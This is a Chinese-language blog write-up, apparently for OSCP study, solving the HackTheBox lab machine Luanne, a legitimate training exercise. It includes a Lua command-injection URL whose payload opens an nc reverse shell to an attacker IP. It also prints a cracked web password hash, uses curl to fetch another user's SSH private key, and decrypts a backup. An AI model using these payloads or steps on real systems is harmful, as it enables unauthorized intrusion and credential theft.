OSCP备考_0x33_HackThBox靶机_luanne

Ethan医生2周前靶场35

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.167.171 (扫描TCP)


image.png



nmap -sU --top-ports 100 10.129.167.171  (扫描UDP)

发现访问都需要账号密码,查看到weather目录可以尝试爆破看看


gobuster dir -u http://10.129.167.171/weather -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php,txt,html

image.png

然后我们会发现一个forecast的目录


image.png

image.png

这篇文章给了一个例子

https://www.stackhawk.com/blog/lua-command-injection-examples-and-prevention/

然后进行注入

http://10.129.167.171/weather/forecast?city=London%27);os.execute(%27whoami%27)+--

http://10.129.167.171/weather/forecast?city=London%27)%20os.execute(%27rm+%2ftmp%2ffa%3bmkfifo+%2ftmp%2ffa%3bcat+%2ftmp%2ffa|%2fbin%2fsh+-i+2%3E%261|nc+10.10.16.38+3333+%3E%2ftmp%2ffa%3b%27)--

image.png

image.png

底下有个.htpasswd查看出有密钥

webapi_user:$1$vVoNCsOl$lMtBS6GL2upDbR4Owhzyc0

image.png

iamthebest

使用webapi_user/iamthebest可以登录80端口的web服务,如图:

image.png

没啥线索,9001是无法登入的

image.png

在信息搜集脚本内发现

image.png

image.png

直接使用目前的SHELL做提权搜索

image.png

然后运行

发现

curl -s http://127.0.0.1:3001/~r.michaels/ -u webapi_user:iamthebest

用户r.michaels的Shell

搜索发现bozohttpd组件存在CVE-2015-8212,CVE-2014-5015,CVE-2010-2320,但是都没有漏洞利用脚本。文章:https://www.anquanke.com/vul/id/1178769描述可以借助以"/~"序列开头的多个URIs请求获取主目录列表内容,但不知道怎么用。在论坛https://raidforums.com/Thread-Tutorial-Luanne-Tutorial-Discussion?page=2发现自己忽略了日志中的3001端口相关信息,成功被作者忽悠,如图:


curl -s http://127.0.0.1:3001/~r.michaels/id_rsa -u webapi_user:iamthebest


image.png

image.png

ls -l /home/r.michaels/.gnupg/
我注意到 .gnupgr.michael 主目录中的目录,它包含密钥环:

在gpg密钥的目录下

netpgp --decrypt --output=/tmp/rong.tar.gz backups/devel_backup-2020-09-16.tar.gz.enc


cd /tmp

gunzip rong.zip

tar zxvf rong.tar

image.png

标签: OSCP

相关文章

OSCP备考_0x14_Vulnhub靶机_Raven: 2

OSCP备考_0x14_Vulnhub靶机_Raven: 2

名称说明靶机下载链接https://www.vulnhub.com/entry/raven-2,269/攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:192.168....

 OSCP备考_0x11_Vulnhub靶机_IMF: 1

OSCP备考_0x11_Vulnhub靶机_IMF: 1

名称说明靶机下载链接https://www.vulnhub.com/entry/imf-1,162/攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:192.168.23...

OSCP备考_0x04_Vulnhub靶机_KIOPTRIX:LEVEL1.3(#4)

OSCP备考_0x04_Vulnhub靶机_KIOPTRIX:LEVEL1.3(#4)

名称说明靶机下载链接https://www.vulnhub.com/entry/kioptrix-level-13-4,25/攻击机(kali)ip:192.168.233.168靶机(CentOS)...

OSCP备考_0x44_HackThBox靶机_Windows_ Silo

OSCP备考_0x44_HackThBox靶机_Windows_ Silo

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.95.188 (扫描TCP)http都没有查看到可以利用的点这边直接是看看orcal的漏...

OSCP备考_0x01_HackThBox靶机_Linux_Shocker

OSCP备考_0x01_HackThBox靶机_Linux_Shocker

先连接到外网开放的服务器openvpn xxx.ovpn信息收集nmap -p- 10.129.216.48 (这样扫描太慢了)nmap -sCV -p- --min-rate 10000 -T4 -...

OSCP备考_0x18_HackThBox靶机_Linux_Popcorn

OSCP备考_0x18_HackThBox靶机_Linux_Popcorn

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.70.193 (扫描TCP)nmap -sU --top-ports 100 ...

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。